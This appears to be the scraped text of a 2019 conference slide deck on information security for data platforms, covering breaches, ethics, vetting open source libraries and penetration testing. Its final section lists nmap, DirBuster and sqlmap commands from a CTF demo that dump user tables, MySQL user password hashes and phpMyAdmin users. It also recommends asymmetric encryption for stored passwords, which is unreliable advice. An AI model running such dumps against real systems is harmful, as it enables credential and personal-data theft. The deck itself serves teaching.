SlideShare a Scribd company logo
Demystify Information Security & Threats for
Data-Driven Platforms
Chetan Khatri
Solution Architect - Data & ML.
Accionlabs Inc.
18th Oct, 2019
Who Am I?
Professional Career:
● 2016 - Present. - Technical Lead / Solution Architect - Data & ML.
● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice.
● 2014 - 2016 - Developer - Data Platforms.
● 2012 - 2014 - Consultant - Product developments.
University: Master of Computer Science.
Data Warehousing, Data Mining, Information Security / Cryptography, Reverse
Engineering, Information Retrieval.
Agenda
● Motivation
● Information Security - Ethics.
● Encryption
● Authentication
● Information Security & Potential threats with Open Source World.
● Find vulnerabilities.
● Checklist before using any Open Source library.
● Vulnerabilities report.
● Penetration Testing for Data Driven Developments.
Information Security - Motivation
Why Information Security is important?
Information Security - Motivation
Source:
https://www.huffingtonpost.in/2018/07/06/hackers-have-ac
cessed-email-ids-phone-numbers-of-over-5-million-yatra-u
sers_a_23475885/
Information Security - Motivation
Source:
https://techcrunch.com/2019/01/30/state-b
ank-india-data-leak/
Information Security - Motivation
Source:
https://techcrunch.com/2019/01/30/state-b
ank-india-data-leak/
Information Security - Motivation
Source:
https://economictimes.indiatimes.com/smal
l-biz/security-tech/security/zomato-hacked-
security-breach-results-in-17-million-user-d
ata-stolen/articleshow/58729251.cms
Information Security - Motivation
Source:
https://www.forbes.com/sites/zakdoffman/2
019/07/09/warning-as-millions-of-zoom-us
ers-risk-webcam-hijack-change-your-settin
gs-now/#281cb40642d9
Information Security - Motivation
Information Security - Motivation
Information Security - Motivation
Source:
https://www.zdnet.com/article/another-data-leak-hits-indi
a-aadhaar-biometric-database/
Information Security - Ethics.
● Information Storage - What, Which form, Access to whom?
● Information Usage - Where, How, Which form?
● Responsibility - Ownership, usage?
● Confidentiality
● Authentication
● Governance - Regulators, Guidelines, Damage?
● Freedom vs Force
● Damage to the Society.
● Impact on humanity.
● Data Breach and Cost.
Freedom vs Force
Freedom vs Force
Source:
https://en.wikipedia.org/wiki/Facebook%E2%80%93Cambridge_Analytica_data_scandal
Freedom vs Force
Source:
https://www.cnbc.com/2018/04/10/facebook-cambridge-anal
ytica-a-timeline-of-the-data-hijacking-scandal.html
Source:
https://www.engadget.com/2019/07/24/facebook-will-pay-5-b
illion-fine-for-cambridge-analytica-data-b/
Data Monetization against ethics
Source:
https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns-
about-cambridge-analytica-in-september-2015-per-court-filing/
Source:
https://www.theguardian.com/news/2018/mar/17/cambridge-analyti
ca-facebook-influence-us-election
Encryption
How many people have seen Password in Plain Text at Database?
80%??
90%??
Yes, Sad but True.
Source:
https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack
-password/
Encryption
How many people have seen Password in Plain Text at Database?
80%??
90%??
Yes, Sad but True.
Never ever store password of the application in Plain-text.
Encrypt it. Use Asymmetric Key Encryption
If RSA, use ssh-keygen -t rsa -b 4096
Authentication
Open IP
Open Ports
Default Username and Password for Database, Services etc.
Chmod 777 for all directories, files ! Lol ;p
Information Security & Potential threats
with Open Source World.
Information Security & Potential threats with Open
Source World.
How many of you use Open Source ?
Security for Open Source world
How well do you know what is inside your project?
Security for Open Source world
Known Good Development practices.
Community Supported Open Source Code.
v/s
Random Code found on the Internet.
Vulnerability in Open Source
Source:
https://synopsys.com/content/dam/synopsys/sig-assets/repo
rts/2018-ossra.pdf
How Do I Choose GOOD Open Source
How do I choose SECURE open source packages?
How do I choose SECURE open source packages?
Have a look
First look
Key questions for a first look?
● Read the README.md or any other readily accessible introductory
information?
● Does code seem to be held with good software development standards?
● Does this code develop for professional purposes or hobby projects?
● Any signs for known issues in the code?
● Does this code only solve one use case or is it robust enough for other use
cases?
● Is this code active or an archive, “abandoned”?
Look for warning signs...
Warning Signs
Even an author says - to use something else!
Source:
https://code.google.com/archive/p/c
rypto-js/
Build by an unauthorized person
Source:
https://metacpan.org/release/Tivoli-
AccessManager-Admin
I did not write this code, but I like it.
Source:
https://github.com/kbranigan/cJSON
Not maintained anymore … Archived!
Source:
https://code.google.com/archive/p/crypto-js/
Dumbest library - An author!
Source:
https://github.com/kbranigan/cJSON/commit/730
209a718cc9bada631cea136d13017752720f5
It is slower and more subjective to side-channel
attacks by nature.
Source:
http://www.literatecode.com/aes256
What to watch before using any
package/library?
Key Questions for each Open Source Library
Do only 1-2 Collaborators exist? Chances are
more to have unreviewed, harmful code.
Code merged to master branch is been reviewed
with PR?
How many issues are OPEN?
Validate that OPEN issues are being addressed?
Is that code maintained or abandon?
Are issues getting fixed and released promptly?
Key Questions for each Open Source Library
Check recently active committers and
commit? To understand how old is the
project.
Check how they handle vulnerabilities and
security.
How you can report security
vulnerabilities?
Check open security bugs/issues?
Good example: Apache Community.
https://www.apache.org/security/
Reporting A Vulnerability
Vulnerability Handling
No known vulnerabilities doesn’t mean SECURITY!
1101 new vulnerabilities
reported only in Oct,
2019.
Source:
https://nvd.nist.gov/vuln/full-l
isting/2019/10
Vulnerabilities report
we are going far worse!
Source:
https://www.cvedetails.com/brows
e-by-date.php
Penetration Testing
{Network, Database}
Check number of OPEN services and ports
sudo nmap -p-
-sS -A
IP-Address
Server Files / Directories Scan on permission and
Access
java -jar DirBuster-0.12.jar -H -u
http://167.71.224.201:1337
httrack website copier
Subgraph Vega
● Vega is a free and open source web security scanner and web security testing
platform to test the security of web applications.
● SQL Injection
● XSS
● Inadvertently disclosed sensitive information
● Reflected cross-site scripting
● Stored cross-site scripting
● Blind SQL injection
● Remote file include
● Shell injection
● TLS / SSL security settings
Setup Proxy for Vega Tool
Setup Proxy for Vega Tool
Vega - Start the proxy!
Vega - Start scanning Web application
Vega - Start scanning Web application
Security Scanning alert summary
Security Scanning alert summary
Web Application - Tracing web request payload at Proxy
Web Application - Tracing web request payload at Proxy
Web Application - Intercepting the response callback at Proxy
SqlMap - A penetration testing tool for exploiting SQL
injection flaws and a lot!
● Database fingerprinting.
● Full Support for SQL Injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based,
stacked queries and out-of-band.
● Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
● dump database tables entirely.
● Out of Box Search support for Database names, Table names, Column names and values.
● Support to execute arbitrary commands and retrieve their standard output.
● Support to establish an out-of-band stateful TCP connection between the attacker machine and the database
server.
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
Demo - Penetration testing a Web Application using SQLMap
SQLMap - Commands
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables user_profile
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile -C Email, Mobile, Name --dump
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T ctf --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 --dump
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T users --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password --dump
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin --tables
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns
python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns --dump
https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a
8709f33ac5
Questions?
Hope you had a fun!
Thank you!
Chetan Khatri, chetan.khatri@live.com
@khatri_chetan - https://twitter.com/khatri_chetan
https://github.com/chetkhatri

More Related Content

What's hot

AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for Thought
NUS-ISS
 
The good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurityThe good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurity
Mohammad Khreesha
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet version
Chandrapal Badshah
 
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
Anton Goncharov
 
The Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security AnalysisThe Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security Analysis
Anton Goncharov
 
Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!
VINCIT SPRL - STRATEGY
 
Is AI going to provide safety for us?
Is AI going to provide safety for us?Is AI going to provide safety for us?
Is AI going to provide safety for us?
DLabs
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by  C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by  C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
CODE BLUE
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINT
Chandrapal Badshah
 
AI and ML in Cybersecurity
AI and ML in CybersecurityAI and ML in Cybersecurity
AI and ML in Cybersecurity
Forcepoint LLC
 
Grounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge BaseGrounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge Base
Vaticle
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint   c0c0n 2017Empowering red and blue teams with osint   c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017
reconvillage
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!
Nutan Kumar Panda
 
OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019
RedHunt Labs
 
How Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help businessHow Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help business
Ajay Ohri
 
OSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligenceOSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligence
Deep Shankar Yadav
 
AI and the Impact on Cybersecurity
AI and the Impact on CybersecurityAI and the Impact on Cybersecurity
AI and the Impact on Cybersecurity
Graham Mann
 
Testing Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche ExposedTesting Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche Exposed
TechWell
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
SSIMeetup
 
Getting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and GraqlGetting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and Graql
Vaticle
 

What's hot (20)

AI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for ThoughtAI and Cybersecurity - Food for Thought
AI and Cybersecurity - Food for Thought
 
The good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurityThe good, the bad, and the ugly on integration ai with cybersecurity
The good, the bad, and the ugly on integration ai with cybersecurity
 
OSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet version
 
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
2018 BSidesSF Buiding Intelligent Automatons with Semantic Reasoning
 
The Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security AnalysisThe Other AI: How Semantic Reasoning Automates Security Analysis
The Other AI: How Semantic Reasoning Automates Security Analysis
 
Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!Market OSINT - 3 Tips to convince YOU to use it!
Market OSINT - 3 Tips to convince YOU to use it!
 
Is AI going to provide safety for us?
Is AI going to provide safety for us?Is AI going to provide safety for us?
Is AI going to provide safety for us?
 
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by  C...[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by  C...
[CB19] Cyber Threat Landscape in Japan – Revealing Threat in the Shadow by C...
 
Let’s hunt the target using OSINT
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINT
 
AI and ML in Cybersecurity
AI and ML in CybersecurityAI and ML in Cybersecurity
AI and ML in Cybersecurity
 
Grounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge BaseGrounding Conversational AI in a Knowledge Base
Grounding Conversational AI in a Knowledge Base
 
Empowering red and blue teams with osint c0c0n 2017
Empowering red and blue teams with osint   c0c0n 2017Empowering red and blue teams with osint   c0c0n 2017
Empowering red and blue teams with osint c0c0n 2017
 
OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!OSINT Black Magic: Listen who whispers your name in the dark!!!
OSINT Black Magic: Listen who whispers your name in the dark!!!
 
OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019OSINT for Proactive Defense - RootConf 2019
OSINT for Proactive Defense - RootConf 2019
 
How Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help businessHow Big Data ,Cloud Computing ,Data Science can help business
How Big Data ,Cloud Computing ,Data Science can help business
 
OSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligenceOSINT- Leveraging data into intelligence
OSINT- Leveraging data into intelligence
 
AI and the Impact on Cybersecurity
AI and the Impact on CybersecurityAI and the Impact on Cybersecurity
AI and the Impact on Cybersecurity
 
Testing Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche ExposedTesting Application Security: The Hacker Psyche Exposed
Testing Application Security: The Hacker Psyche Exposed
 
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare NelsonZero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
Zero-Knowledge Proofs: Privacy-Preserving Digital Identity with Clare Nelson
 
Getting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and GraqlGetting Productive my Journey with Grakn and Graql
Getting Productive my Journey with Grakn and Graql
 

Similar to Demystify Information Security & Threats for Data-Driven Platforms With Chetan Khatri

2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards
APIsecure_ Official
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
MarceloCunha571649
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
Ernest Staats
 
Web Security... Level Up
Web Security... Level UpWeb Security... Level Up
Web Security... Level Up
Izzet Mustafaiev
 
Penetration testing dont just leave it to chance
Penetration testing dont just leave it to chancePenetration testing dont just leave it to chance
Penetration testing dont just leave it to chance
Dr. Anish Cheriyan (PhD)
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
Graham Charters
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
Amine SAIGHI
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal Tricks
ThreatReel Podcast
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101
Narudom Roongsiriwong, CISSP
 
OSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersOSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and Practitioners
Megan DeBlois
 
Dev{sec}ops
Dev{sec}opsDev{sec}ops
Dev{sec}ops
Steven Carlson
 
Web Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging ThreatsWeb Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging Threats
Alan Kan
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0
Neelu Tripathy
 
Software Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and SecuritySoftware Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and Security
Tao Xie
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
Asep Sopyan
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
fangjiafu
 
PROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITYPROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITY
Sylvain Martinez
 
Security guidelines
Security guidelinesSecurity guidelines
Security guidelines
karthz
 
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Keith Kraus
 

Similar to Demystify Information Security & Threats for Data-Driven Platforms With Chetan Khatri (20)

2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards2022 APIsecure_Securing APIs with Open Standards
2022 APIsecure_Securing APIs with Open Standards
 
technical-information-gathering-slides.pdf
technical-information-gathering-slides.pdftechnical-information-gathering-slides.pdf
technical-information-gathering-slides.pdf
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
Web Security... Level Up
Web Security... Level UpWeb Security... Level Up
Web Security... Level Up
 
Penetration testing dont just leave it to chance
Penetration testing dont just leave it to chancePenetration testing dont just leave it to chance
Penetration testing dont just leave it to chance
 
How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?How to get along with HATEOAS without letting the bad guys steal your lunch?
How to get along with HATEOAS without letting the bad guys steal your lunch?
 
Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testing
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal Tricks
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Secure Code Review 101
Secure Code Review 101Secure Code Review 101
Secure Code Review 101
 
OSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and PractitionersOSINT Basics for Threat Hunters and Practitioners
OSINT Basics for Threat Hunters and Practitioners
 
Dev{sec}ops
Dev{sec}opsDev{sec}ops
Dev{sec}ops
 
Web Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging ThreatsWeb Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging Threats
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0
 
Software Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and SecuritySoftware Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and Security
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
PROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITYPROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITY
 
Security guidelines
Security guidelinesSecurity guidelines
Security guidelines
 
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
 

More from Chetan Khatri

PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-AirflowPyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
Chetan Khatri
 
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in productionScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
Chetan Khatri
 
No more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in productionNo more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in production
Chetan Khatri
 
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_productionPyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
Chetan Khatri
 
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scalaAutomate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Chetan Khatri
 
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
Chetan Khatri
 
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
Chetan Khatri
 
An Introduction to Spark with Scala
An Introduction to Spark with ScalaAn Introduction to Spark with Scala
An Introduction to Spark with Scala
Chetan Khatri
 
HBase with Apache Spark POC Demo
HBase with Apache Spark POC DemoHBase with Apache Spark POC Demo
HBase with Apache Spark POC Demo
Chetan Khatri
 
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
Chetan Khatri
 
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
Chetan Khatri
 
Fossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatriFossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatri
Chetan Khatri
 
Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...
Chetan Khatri
 
An Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learningAn Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learning
Chetan Khatri
 
Introduction to Computer Science
Introduction to Computer ScienceIntroduction to Computer Science
Introduction to Computer Science
Chetan Khatri
 
An introduction to Git with Atlassian Suite
An introduction to Git with Atlassian SuiteAn introduction to Git with Atlassian Suite
An introduction to Git with Atlassian Suite
Chetan Khatri
 
Think machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetanThink machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetan
Chetan Khatri
 
A step towards machine learning at accionlabs
A step towards machine learning at accionlabsA step towards machine learning at accionlabs
A step towards machine learning at accionlabs
Chetan Khatri
 
Voltage measurement using arduino
Voltage measurement using arduinoVoltage measurement using arduino
Voltage measurement using arduino
Chetan Khatri
 
Design & Building Smart Energy Meter
Design & Building Smart Energy MeterDesign & Building Smart Energy Meter
Design & Building Smart Energy Meter
Chetan Khatri
 

More from Chetan Khatri (20)

PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-AirflowPyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
 
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in productionScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
 
No more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in productionNo more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in production
 
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_productionPyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
 
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scalaAutomate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
 
